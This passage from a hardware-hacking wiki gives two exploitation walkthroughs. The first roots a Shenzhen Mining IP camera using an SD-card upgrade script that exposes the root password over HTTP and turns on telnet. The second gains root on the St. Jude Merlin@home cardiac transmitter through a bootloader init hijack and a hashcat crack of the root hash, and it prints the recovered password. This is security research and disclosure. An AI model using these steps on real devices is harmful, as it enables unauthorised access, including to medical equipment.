00000000 31 38 4d 47 00 00 36 32 00 01 00 00 00 01 00 00 |18MG..62........|<br />
00000010 00 0b 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 |................|<br />
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|<br />
00000030 00 00 00 00 00 00 00 08 00 00 00 0c 00 00 00 18 |................|<br />
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|<br />
*<br />
000000f0 00 00 00 00 00 00 00 00 00 00 00 00 aa 55 00 00 |.............U..|<br />
00000100 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|<br />
*<br />
00001000 80 5a 47 4d 00 00 00 00 00 00 29 18 00 00 00 00 |.ZGM......).....|<br />
00001010 6f 62 73 6e 62 2e 74 6f 00 00 6e 69 00 00 00 00 |obsnb.to..ni....|<br />
00001020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|<br />
*<br />
00001100 ea 00 00 0e e5 9f f0 14 e5 9f f0 14 e5 9f f0 14 |................|<br />
00001110 e5 9f f0 14 e1 a0 00 00 e5 9f f0 10 e5 9f f0 10 |................|</pre><br />
<br />
Lets reorder the bytes. <br />
<br />
<pre>objcopy -I binary -O binary --reverse-bytes=4 cloudipcamera_mxic25l12835f.BIN cloudipcamera_mxic25l12835f.BIN.swapped</pre><br />
<br />
Merging the two halves together gives us the entire image.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera$ binwalk cloudipcamera_mxic25l12835f.BIN.merged <br />
<br />
DECIMAL HEXADECIMAL DESCRIPTION<br />
--------------------------------------------------------------------------------<br />
809008 0xC5830 CRC32 polynomial table, little endian<br />
852224 0xD0100 Linux kernel ARM boot executable zImage (little-endian)<br />
865293 0xD340D gzip compressed data, maximum compression, from Unix, last modified: 2015-10-23 07:16:16<br />
12582912 0xC00000 JFFS2 filesystem, little endian</pre><br />
<br />
'''Filesystem'''<br />
<br />
The notable data includes the root filesystem.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls<br />
D340D D8B3E4 D8BA40 D8BF44 D8CE50 DC11AC DC15E4 DC1AF4 E7C814 E7CC44 ED5158 ED565C ED5BAC FB50C0 FFE67C jffs2-root-1 jffs2-root-3 jffs2-root-8<br />
_D340D.extracted D8B514 D8BC0C D8C670 D8CEFC DC12AC DC16E8 DC1BC0 E7C90C E7CD44 ED5324 ED5754 ED5CD8 FB51EC FFEAB0 jffs2-root-10 jffs2-root-4 jffs2-root-9<br />
D8B0BC D8B640 D8BD04 D8CBC4 D8D4E8 DC1340 DC180C E7C050 E7CA0C E7CE48 ED541C ED5854 ED5D64 FB5278 FFEDFC jffs2-root-11 jffs2-root-5<br />
D8B1BC D8B6CC D8BE04 D8CCBC D8E460 DC13EC DC193C E7C198 E7CAA0 E7CF6C ED551C ED5958 ED5E30 FB5344 jffs2-root jffs2-root-12 jffs2-root-6<br />
D8B2C0 D8B938 D8BE98 D8CDBC DC10B4 DC14E4 DC1A68 E7C5B0 E7CB4C ED5050 ED55B0 ED5A7C ED5F38 FFE230 jffs2-root-0 jffs2-root-2 jffs2-root-7<br />
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/<br />
1A100 _1A100.extracted 9FD828<br />
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/<br />
168.cpio cpio-root<br />
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/cpio-root/<br />
bin dev etc init lib mnt proc project root sbin sys tmp usr var<br />
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/cpio-root/root/<br />
welcome.txt<br />
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ cat _D340D.extracted/_1A100.extracted/cpio-root/root/welcome.txt <br />
welcome to (c)shenzhen mining mipc world!<br />
enjoy it!</pre><br />
<br />
And the config storage.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls jffs2-root/fs_1/ -R<br />
jffs2-root/fs_1/:<br />
dev_data ipc_data latest_dhcp_ip_eth0 system_data<br />
<br />
jffs2-root/fs_1/dev_data:<br />
system_config<br />
<br />
jffs2-root/fs_1/ipc_data:<br />
8188eu_ap_2G.conf aec_amr.xml ao0.xml buildinfo.xml io_alert.xml motion_alert.xml ntp_info.xml ptz0.xml RT2870AP.dat vec_half.xml vs0.xml<br />
action_conf.xml aec_g711.xml aoc0.xml data_version ipc_conf.xml motion_ex_alert.xml osd_show_time.xml ptz.xml RT2870STA_adhoc.dat vec_hd.xml vsc0.xml<br />
active_server.xml aec_g726.xml ap.conf default_gw.xml license.xml net_info.sh pass.mp ra0.xml RT2870STA_infra.dat vec_jpeg.xml<br />
aec_aac.xml alarm.xml as0.xml dps localtime net_info.xml pass.up recording_root.xml sd_conf.xml vec_min.xml<br />
aec_adpcm.xml alert_device_conf.xml asc3.xml eth0.xml mediainfo.xml nick_conf.xml proxy.xml recording_task.xml server.xml vec_normal.xml<br />
<br />
jffs2-root/fs_1/ipc_data/dps:<br />
cacs<br />
<br />
jffs2-root/fs_1/ipc_data/dps/cacs:<br />
61646d696e02<br />
<br />
jffs2-root/fs_1/system_data:</pre><br />
<br />
Theres also an archive in /project on the root filesystem.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root$ ls -laht project/<br />
<br />
total 3.2M<br />
drwxr-xr-x 2 rjmendez rjmendez 4.0K Apr 20 12:17 .<br />
-rwxr-xr-x 1 rjmendez rjmendez 3.2M Apr 20 12:17 ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma<br />
-rwxr-xr-x 1 rjmendez rjmendez 11 Apr 20 12:17 tar.crc<br />
drwxrwxr-x 15 rjmendez rjmendez 4.0K Apr 20 12:17 ..<br />
-rwxr-xr-x 1 rjmendez rjmendez 135 Apr 20 12:17 buildinfo.xml</pre><br />
<br />
Its called by the init script in /etc/init.d/dev_init.sh<br />
<br />
<pre>#prepare project<br />
unlzma -c /project/*.tar.lzma > /tmp/project.tar<br />
rm /project/*.tar.lzma<br />
<br />
...<br />
<br />
tar -xvf /tmp/project.tar -C /project/<br />
rm -rf /tmp/project.tar<br />
chmod -R 777 /project<br />
<br />
#dev_start<br />
if [ -e /mnt/mtd/flag_debug_dev_start ]; then<br />
echo "[`date '+%Y-%m-%d %H:%M:%S'` dev_init.sh]" /mnt/mtd/flag_debug_dev_start existed<br />
else<br />
echo "[`date '+%Y-%m-%d %H:%M:%S'` dev_init.sh]" run /project/apps/app/ipc/data/sh/dev_start.sh<br />
cd /project/apps/app/ipc/data/sh<br />
./dev_start.sh<br />
fi</pre><br />
<br />
Extracting it all gives us this.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ unlzma -c ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma > project.tar<br />
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ tar -xf project.tar<br />
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ ls -laht<br />
total 14M<br />
drwxr-xr-x 5 rjmendez rjmendez 4.0K Apr 20 14:03 .<br />
-rw-rw-r-- 1 rjmendez rjmendez 11M Apr 20 14:02 project.tar<br />
-rwxr-xr-x 1 rjmendez rjmendez 3.2M Apr 20 12:17 ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma<br />
-rwxr-xr-x 1 rjmendez rjmendez 11 Apr 20 12:17 tar.crc<br />
drwxrwxr-x 15 rjmendez rjmendez 4.0K Apr 20 12:17 ..<br />
-rwxr-xr-x 1 rjmendez rjmendez 135 Apr 20 12:17 buildinfo.xml<br />
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 apps<br />
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 platforms<br />
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 faraday<br />
-rw-r--r-- 1 rjmendez rjmendez 2 Oct 23 2015 kernel_version</pre><br />
<br />
Tons of good data in here! <br />
<br />
'''Gaining root'''<br />
<br />
We have a great entry point as well inside of /project/apps/app/ipc/data/sh/sd_card_insert.sh.<br />
<br />
<pre>#!/bin/sh<br />
<br />
#mount sd_card<br />
if [ ! -d /mnt/sd ]; then<br />
/bin/mkdir /mnt/sd<br />
fi<br />
mount -o noatime,nodiratime,norelatime -t vfat /dev/mmcblk0p1 /mnt/sd<br />
<br />
#run hook<br />
if [ -e /mnt/sd/upgrade/upgrade.sh ]; then<br />
chmod 777 /mnt/sd/upgrade/upgrade.sh<br />
sh /mnt/sd/upgrade/upgrade.sh &<br />
fi<br />
<br />
wget http://127.0.0.1:80/ccm/CcmNotifyRequest/-dvalue-1.xml -O 1.xml<br />
<br />
rm -f 1.xml</pre><br />
<br />
What the hell is going on in /project/apps/app/ipc/data/sh/dev_passwd.sh?<br />
<br />
<pre>path_prompt=/tmp/prompt.debug<br />
path_pass=/tmp/pass.debug<br />
<br />
...<br />
<br />
#Generate ctx if needed<br />
if [ -z $ctx ]; then<br />
ctx_file=/tmp/ctx.dev<br />
if [ -e $ctx_file ]; then<br />
read ctx < $ctx_file<br />
fi<br />
<br />
if [ -z $ctx ]; then<br />
ctx=$RANDOM<br />
echo $ctx > $ctx_file<br />
fi<br />
fi<br />
<br />
...<br />
<br />
${bindir}/mipc_tool -cmd pass -devid ${devid} -prompt ${path_prompt} -pass ${path_pass}<br />
<br />
...<br />
<br />
read pass < $path_pass<br />
read prompt < $path_prompt<br />
echo "pass=${pass}, prompt=${prompt}"<br />
/bin/hostname ${prompt}${promp_eth}${promp_wifi}<br />
echo "root:${pass}"|chpasswd</pre><br />
<br />
It looks like they are generating a new root password after rebooting. Everything is still running as root and the password is in a file at /tmp/pass.debug, we should be able to get in over the serial line but that’s not very sexy.<br />
A look into /project/apps/app/ipc/data/sh/dev_telnet.sh gives us another option.<br />
<br />
<pre>#!/bin/sh<br />
<br />
port=9527<br />
file_flag=/mnt/mtd/flag_debug_telnet<br />
if [ -e ${file_flag} ]; then<br />
mode=on<br />
fi<br />
<br />
usage()<br />
{<br />
echo Usage:$0 [-m,--mode on/off] [-h,--help]<br />
exit<br />
}<br />
<br />
ARGS=`getopt -a -o m:h -l mode:,help -- "$@"`<br />
<br />
#set -- "${ARGS}"<br />
eval set -- "${ARGS}"<br />
<br />
while true<br />
do<br />
case "$1" in<br />
-m|--mode)<br />
mode="$2"<br />
shift<br />
;;<br />
-h|--help)<br />
usage<br />
;;<br />
--)<br />
shift<br />
break<br />
;;<br />
esac<br />
shift<br />
done<br />
<br />
if [ x"${mode}" == xon ]; then<br />
if [ ! -e ${file_flag} ]; then<br />
touch ${file_flag}<br />
fi<br />
<br />
if [ "" == "`ps -w | grep telnet | grep ${port} | grep -v grep`" ]; then<br />
telnetd -p ${port} &<br />
fi<br />
elif [ x"${mode}" == xoff ]; then<br />
if [ -e ${file_flag} ]; then<br />
rm ${file_flag}<br />
fi<br />
<br />
ps w| grep telnetd | grep ${port} | grep -v -E "grep" | while read line<br />
do<br />
pid=${line%% *}<br />
kill -9 $pid<br />
done<br />
fi</pre><br />
<br />
Well well well… Lets create an upgrade folder and throw in this script inside of upgrade.sh on our vfat formatted micro sd card.<br />
<br />
<pre>#!/bin/sh<br />
sleep 45<br />
cd /project/apps/app/ipc/data/http/ && ln -s /tmp &<br />
/project/apps/app/ipc/data/sh/dev_telnet.sh -m on</pre><br />
<br />
After a little bit we should see this show up on the web server.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera$ curl http://192.168.187.254/tmp/pass.debug<br />
264e37dcd841b35344c68e8f95dc8b11</pre><br />
<br />
And then we can try telnet on the nonstandard debug port.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera$ telnet 192.168.187.254 9527<br />
Trying 192.168.187.254...<br />
Connected to 192.168.187.254.<br />
Escape character is '^]'.<br />
<br />
1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254 login: root<br />
Password: <br />
|---------------------------------------------------------------------------|<br />
| A |<br />
| AAA |<br />
| AAAAA |<br />
| AAAAAAA |<br />
| AAAA AA |<br />
| A AAAA AA |<br />
| AAA AAAA AA AAA AAAAA AAA AAAAA AAAAA |<br />
| AAAAA AAAA AA AA AA AA AA AA AA |<br />
| AAAAAAAAAA AA AAA AA AA AAA AA AA AA AA |<br />
| AAAAA AAAA AA AAA AA AA AAA AA AA AA AA |<br />
| AAAAA A AA AAA AA AA AAA AA AA AAAAAA |<br />
| AAAAA AA AAA AA AA AAA AA AA AA |<br />
| AAAAAA AAAA AAA AA AA AAA AA AA AAAAAA |<br />
|===========================================================================|<br />
| |<br />
| http://www.shenzhenmining.com |<br />
| power by (C)shenzhenmining 2012 |<br />
|---------------------------------------------------------------------------|<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# echo "Root password is '264e37dcd841b35344c68e8f95dc8b11'"<br />
Root password is '264e37dcd841b35344c68e8f95dc8b11'<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# ls -l /root<br />
-rwxr-xr-x 1 root root 54 Oct 23 2015 welcome.txt<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /root/welcome.txt <br />
welcome to (c)shenzhen mining mipc world!<br />
enjoy it!<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /etc/passwd<br />
root:x:0:0:root:/root:/bin/sh<br />
bin:x:1:1:bin:/bin:/bin/sh<br />
daemon:x:2:2:daemon:/usr/sbin:/bin/sh<br />
adm:x:3:4:adm:/adm:/bin/sh<br />
lp:x:4:7:lp:/var/spool/lpd:/bin/sh<br />
sync:x:5:0:sync:/bin:/bin/sync<br />
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown<br />
halt:x:7:0:halt:/sbin:/sbin/halt<br />
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh<br />
operator:x:11:0:Operator:/var:/bin/sh<br />
nobody:x:99:99:nobody:/home:/bin/sh<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /etc/shadow<br />
root:S5Ada/QN0yHBo:12963:0:99999:7:::<br />
bin:*:12963:0:99999:7:::<br />
daemon:*:12963:0:99999:7:::<br />
adm:*:12963:0:99999:7:::<br />
lp:*:12963:0:99999:7:::<br />
sync:*:12963:0:99999:7:::<br />
shutdown:*:12963:0:99999:7:::<br />
halt:*:12963:0:99999:7:::<br />
uucp:*:12963:0:99999:7:::<br />
operator:*:12963:0:99999:7:::<br />
nobody:*:12963:0:99999:7:::</pre><br />
<br />
This device has never been connected to the internet, lets see what’s running on it.<br />
<br />
<pre>[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# ps | grep mipc<br />
600 root 2532 S ./mipc_tool -cmd wd -len 20 <br />
826 root 2664 S ./mipc_tool -cmd debug -server 1 <br />
945 root 2664 S ./mipc_tool -cmd led -dev eth -interval 500 <br />
987 root 2664 S ./mipc_tool -cmd led -dev wifi -interval 500 <br />
1009 root 2668 S ./mipc_tool -cmd led -dev single -interval 500 <br />
1015 root 2664 S ./mipc_tool -cmd click_listen <br />
1063 root 2668 S ../../../../../platforms/faraday-linux-armv5/bin/mipc_tool -cmd tcpproxy --passive-remote 127.0.0.1:23 --remote 218.14.146.199:7024:/tmp/tcp_post.txt --header-notify-file<br />
1179 root 54140 S ./mipc -cont-conf ../../../apps/app/ipc/conf/container.conf </pre><br />
<br />
== Future ==<br />
<br />
We need to look into mipc_tool and the mipc program itself.</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&diff=2872SJM Merlin at Home2017-08-09T19:21:23Z<p>Rjmendez: </p>
<hr />
<div>__FORCETOC__<br />
{{Disclaimer}}<br />
[[File:Merlin-at-home-1.jpg|100px|left|thumb]]<br />
[[Category:Medical]]<br />
This page will be dedicated to a general overview, descriptions, and information related to the St. Jude Medical Merlin@home Transmitter Model EX1150.<br />
<br />
== About ==<br />
The Merlin@home Transmitter is intended to pair with an Implantable Cardiac Defibrillator (ICD) or Pacemaker and upload the data to the Merlin.net patient care network for review by a physician.<br />
<br />
== Disassembly ==<br />
<gallery><br />
File:Merlin-front.jpg<br />
File:Merlin-back.jpg<br />
File:Merlin-side_usb.jpg<br />
File:Merlin-antenna1.jpg<br />
File:Merlin-antenna2.jpg<br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== UART ==<br />
A Login Console is presented on UART (3.3v) at 115200 baud. The pinout for UART can be found below.<br />
<br />
<gallery><br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== Exploitation ==<br />
<br />
This device boots with the BLOB bootloader (https://sourceforge.net/projects/blob/) to a version of Montavista Linux (https://en.wikipedia.org/wiki/MontaVista) with a restricted root login. It is possible to init hijack by interrupting the bootloader.<br />
<br />
<pre>Post device verification...<br />
Serial2In string: ATi0<br />
Serial2In string: <br />
56000<br />
Modem Post : Passed with retries = 0<br />
<br />
Time taken by POST : [1.197000] seconds<br />
nand_init: manuf=0x000000EC device=0x000000F1<br />
scanning for bad blocks...<br />
nand_check_blocks: nand_read_page() failed, addr=0x02B40000<br />
nand_check_blocks: nand_read_page() failed, addr=0x04B20000<br />
nand_check_blocks: nand_read_page() failed, addr=0x07660000<br />
<br />
Consider yourself BLOBed!<br />
<br />
blob version 2.0.5-pre2 for Tanto Basic Device<br />
Copyright (C) 1999 2000 2001 Jan-Derk Bakker and Erik Mouw<br />
blob comes with ABSOLUTELY NO WARRANTY; read the GNU GPL for details.<br />
This is free software, and you are welcome to redistribute it<br />
under certain conditions; read the GNU GPL for details.<br />
blob release: d20081014_platform_4_16<br />
Memory map:<br />
0x02000000 @ 0xc0000000 (32 MB)<br />
<br />
ram_post executing...<br />
Data Bus Test<br />
Address Bus Test<br />
Data Qualifer Test<br />
Device Test<br />
c0200000status_next, board type = RF board revision = (3)<br />
c1e00000r14_svc = 0x0000034d<br />
Autoboot in progress, press any key to stop ..<br />
Autoboot aborted<br />
Type "help" to get a list of commands<br />
blob> boot console=ttyMX0,115200n8 root=/dev/mtdblock6 ip=dhcp init=/bin/sh BOARD_REVISION=<br />
</pre><br />
<br />
We can pull some useful information from the device.<br />
<br />
<pre>sh-2.05a# cat /etc/passwd<br />
root:0q8h1Maw1oYAU:0:0:root:/root:/bin/bash<br />
bin:*:1:1:bin:/bin:<br />
daemon:*:2:2:daemon:/usr/sbin:<br />
sys:*:3:3:sys:/dev:<br />
adm:*:4:4:adm:/var/adm:<br />
lp:*:5:7:lp:/var/spool/lpd:<br />
sync:*:6:8:sync:/bin:/bin/sync<br />
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown<br />
halt:*:8:10:halt:/sbin:/sbin/halt<br />
mail:*:9:11:mail:/var/spool/mail:<br />
news:*:10:12:news:/var/spool/news:<br />
uucp:*:11:13:uucp:/var/spool/uucp:<br />
operator:*:12:0:operator:/root:<br />
games:*:13:100:games:/usr/games:<br />
ftp:*:15:14:ftp:/var/ftp:<br />
man:*:16:100:man:/var/cache/man:<br />
www:*:17:100:www:/var/www:<br />
sshd:*:18:100:sshd:/var/run/sshd:<br />
nobody:*:65534:65534:nobody:/home:/bin/sh<br />
sh-2.05a# cat /etc/shadow<br />
cat: /etc/shadow: No such file or directory</pre><br />
<br />
Lets break this.<br />
<br />
<pre>E:\hashcat-3.5.0>hashcat64.exe --session sjm_hash -w 3 -m 1500 e:\sjm_hash -a 3 ?a?a?a?a?a?a?a<br />
hashcat (v3.5.0) starting...<br />
<br />
* Device #1: WARNING! Kernel exec timeout is not disabled.<br />
This may cause "CL_OUT_OF_RESOURCES" or related errors.<br />
To disable the timeout, see: https://hashcat.net/q/timeoutpatch<br />
OpenCL Platform #1: NVIDIA Corporation<br />
======================================<br />
* Device #1: GeForce GTX 980, 1024/4096 MB allocatable, 16MCU<br />
<br />
OpenCL Platform #2: Intel(R) Corporation<br />
========================================<br />
* Device #2: Intel(R) Core(TM) i5-4570 CPU @ 3.20GHz, skipped.<br />
<br />
Hashes: 1 digests; 1 unique digests, 1 unique salts<br />
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates<br />
<br />
Applicable optimizers:<br />
* Zero-Byte<br />
* Precompute-Final-Permutation<br />
* Not-Iterated<br />
* Single-Hash<br />
* Single-Salt<br />
* Brute-Force<br />
<br />
Watchdog: Temperature abort trigger set to 90c<br />
Watchdog: Temperature retain trigger set to 75c<br />
<br />
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =><br />
<br />
0q8h1Maw1oYAU:mah1200<br />
<br />
Session..........: sjm_hash<br />
Status...........: Cracked<br />
Hash.Type........: descrypt, DES (Unix), Traditional DES<br />
Hash.Target......: 0q8h1Maw1oYAU<br />
Time.Started.....: Sun May 07 17:39:55 2017 (9 secs)<br />
Time.Estimated...: Sun May 07 17:40:04 2017 (0 secs)<br />
Guess.Mask.......: ?a?a?a?a?a?a?a [7]<br />
Guess.Queue......: 1/1 (100.00%)<br />
Speed.Dev.#1.....: 544.7 MH/s (60.44ms)<br />
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts<br />
Progress.........: 4764729344/69833729609375 (0.01%)<br />
Rejected.........: 0/4764729344 (0.00%)<br />
Restore.Point....: 0/81450625 (0.00%)<br />
Candidates.#1....: ;~9anan -> $sb~{ka<br />
HWMon.Dev.#1.....: Temp: 67c Fan: 33% Util: 99% Core:1404MHz Mem:3004MHz Bus:16<br />
<br />
Started: Sun May 07 17:39:51 2017<br />
Stopped: Sun May 07 17:40:05 2017</pre><br />
<br />
Attempts to login as root fail, what was going on with that operator user?<br />
<br />
<pre>operator:*:12:0:operator:/root:</pre><br />
<br />
Lets set the password to "test" and attempt logging in.<br />
<br />
<pre>sh-2.05a# grep "operator" /etc/passwd<br />
operator:dPUvQFLH8...A:12:0:operator:/root:</pre><br />
<br />
<pre>[SJM_CONFIGURATION]<br />
VERSION=EX2000 v6.1B PR_6.56<br />
(none) login: root<br />
Password: <br />
Login incorrect<br />
2017-05-14 <br />
(none) login: operator<br />
Password: <br />
operator@(none):~$ whoami<br />
operator<br />
operator@(none):~$ su root<br />
Password: <br />
PAM_unix[266]: (su) session opened for user root by (uid=12)<br />
root@(none):~# whoami<br />
root<br />
root@(none):~# </pre><br />
<br />
== Taking Things Further ==<br />
<br />
Lets look at some of these custom hotplug scripts. /etc/hotplug/usb/sjmusb looks like a good start.<br />
<br />
<pre>#!/bin/bash<br />
#<br />
# Script to mount valid sjm pendrive(s) via hotplug. Hotplug will invoke <br />
# this script only if the attached USB device is a mass-storage device.<br />
# hotplug does this by looking at the device class of the attached usb device<br />
# See /etc/hotplug/usb.usermap. The device class for mass storage devices<br />
# is ______<br />
# <br />
# In a nutshell, the script looks in /proc/scsi/usb-storage* directory to<br />
# find the scsi ID of the attached USB storage device. It then goes on to<br />
# find the device node corresponding to this scsi ID.<br />
# <br />
# version 1.1 - Added USB signature check functionality <br />
#<br />
# For the new cellular adapters - viz mobidata and velocity, ignore the<br />
# mass storage interface reported. Please see comments at the top of<br />
# /etc/hotplug/usb/velocity for details.<br />
#<br />
# - Ashok Iyer (16-Jun-2010)<br />
#<br />
<br />
export PATH=/usr/bin:/usr/local/bin:$PATH<br />
<br />
MOUNT_PATH="/mnt/sjmpendrives"<br />
MOUNT_NUMBER=1<br />
LOG_FILE="/tmp/usbstorage.log"<br />
SGMAP="sg_map"<br />
<br />
<br />
# The functions in this script rely on "echo" to pass information to each<br />
# other. If you need to modify this script, do not use "echo" for debugging.<br />
# Instead use the feedback()/error_exit() functions below. These will log <br />
# information to a log file and do not interfere with information passing <br />
# between functions.<br />
<br />
***snip***<br />
<br />
function check_sign {<br />
local node1=$1"1"<br />
feedback "Checking signature ... "<br />
feedback "node1 = $node1"<br />
dd if=$node1 of=/tmp/.sign bs=1 count=3 skip=501<br />
signature=`cat /tmp/.sign` <br />
<br />
if [ "$signature" = "SJM" ]; then<br />
feedback "Valid pendrive"<br />
echo 0<br />
else<br />
feedback "Invalid pendrive"<br />
echo -1<br />
fi<br />
}<br />
<br />
***snip***<br />
<br />
# We only mount the first partition of a USB storage device. There is no <br />
# requirement to mount multiple partitions. Makes the job easy :-)<br />
function mount_scsi_dev {<br />
local scsi_dev=$1<br />
local mountpt=""<br />
<br />
# check if the first partition of the device is mounted <br />
if ! mount | egrep -q "^$scsi_dev"1"[[:space:]]" <br />
then<br />
mountpt=$(find_unused_mountpt) || error_exit "Failed to find a mount pt"<br />
mkdir -p "$mountpt" || error_exit "Failed to create mount pt $mountpt"<br />
<br />
# FIXME- Ugly hack to detect partitions on USB flash drive<br />
# Possible bug in Kernel and/or devfs. Either use devfs=nomount kernel cmdline<br />
# or fix devfs once and for all.<br />
# There is another problem in devfs that after the USB flash disk is removed<br />
# the corresponding devfs partitions (part1, part2 etc...) still show up. <br />
foobar=`ls -l $scsi_dev | awk '{print $11}'`<br />
dd if=/dev/$foobar of=/dev/null bs=1 count=1 <br />
<br />
# Checking USB signature<br />
ret=`check_sign $scsi_dev` <br />
if [ $ret -eq 0 ]; then<br />
feedback "Valid pendrive"<br />
else<br />
# Tanto: Inform the Exec App to show <br />
# an Invalid Media Error<br />
if [ -p /tmp/remoteInt.pipe ]; then<br />
echo "UsbHotplug InvalidMedia" > /tmp/remoteInt.pipe<br />
error_exit "Invalid pendrive"<br />
else<br />
echo "ERROR: /tmp/remoteInt.pipe does not exist!!!"<br />
fi<br />
fi<br />
<br />
feedback "Mounting $scsi_dev"1" on $mountpt"<br />
mount -t auto $scsi_dev"1" $mountpt<br />
if [ "$?" -eq 0 ]; then<br />
feedback "$scsi_dev"1" is now mounted on $mountpt"<br />
feedback "Launch application specific script" <br />
sh /etc/launch_appln.sh $mountpt<br />
else<br />
feedback "Mount error for $scsi_dev"<br />
fi<br />
else<br />
feedback "Ignoring $scsi_dev - already mounted"<br />
fi<br />
}<br />
<br />
# Find and mount all attached USB storage devices<br />
function mount_all_attached {<br />
local scsiuniqid=""<br />
feedback "Find and mount all attached usb storage devices"<br />
<br />
for scsiuniqid in $(allusb_scsiuniqid)<br />
do<br />
local scsidev="`diskdev_from_uniqid $scsiuniqid`"<br />
if [ "$scsidev" == "UNKNOWN" ]; then<br />
sleep 1<br />
fi<br />
mount_scsi_dev $scsidev<br />
done<br />
}<br />
<br />
***snip***<br />
<br />
<br />
# The remover script will be invoked when the device is removed. This is<br />
# useless in a way because umount will have no effect. The only benefit is<br />
# that the "mount" command will not show stale entries.<br />
<br />
# FIXME - Need to add specialized LOGIC to selectively umount USB flash drive <br />
# which is removed ( unlike umounting all attached USB flash drives )<br />
feedback "REM = $REMOVER"<br />
if [ -f $REMOVER ]; then<br />
echo '/bin/umount /mnt/sjmpendrives/*' >> $REMOVER<br />
else<br />
echo -e '#!/bin/sh\n/bin/umount /mnt/sjmpendrives/*' > $REMOVER<br />
fi<br />
<br />
# Inform the Export data script when pendrive is unplugged.<br />
echo -e '\nps -A | grep export_data \nif [ $? -eq 0 ]; then \n\tif [ -p /tmp/usbDataExport.pipe ]; then \n\t\t echo "Hotplug umount" > /tmp/usbDataExport.pipe \n\tfi\nfi' >> $REMOVER<br />
chmod a+x $REMOVER<br />
<br />
mount_all_attached</pre><br />
<br />
Lets look inside of /etc/launch_appln.sh<br />
<br />
<pre>#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
echo "usage: ./launch_appln.sh /mnt/pendrive"<br />
exit<br />
fi<br />
<br />
# FIXME <br />
# This script may be invoked by hotplug <br />
# Do not run the script if it is already running <br />
# updater or data export<br />
<br />
mountpt=$1<br />
script_path=/apps/tanto/<br />
<br />
if [ -f $mountpt/version.ini ]; then<br />
# call updater script<br />
echo "Launching updater script"<br />
if [ -f $mountpt/etc/init.d/upgrade_script.sh ]; then<br />
sh $mountpt/etc/init.d/upgrade_script.sh $mountpt > /tmp/debugUpdater.txt 2>&1<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
else<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
exit 0<br />
fi<br />
else<br />
# Call Data export script<br />
echo "Launching export data script"<br />
sh $script_path/export_data.sh $mountpt<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
fi</pre><br />
<br />
It looks like their pendrive "signature" is fairly easy to get around.<br />
<br />
<pre>rjmendez@Rjmendez:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00116472 s, 2.6 kB/s<br />
rjmendez@Rjmendez:~/stjude_merlin$ hd /tmp/.sign <br />
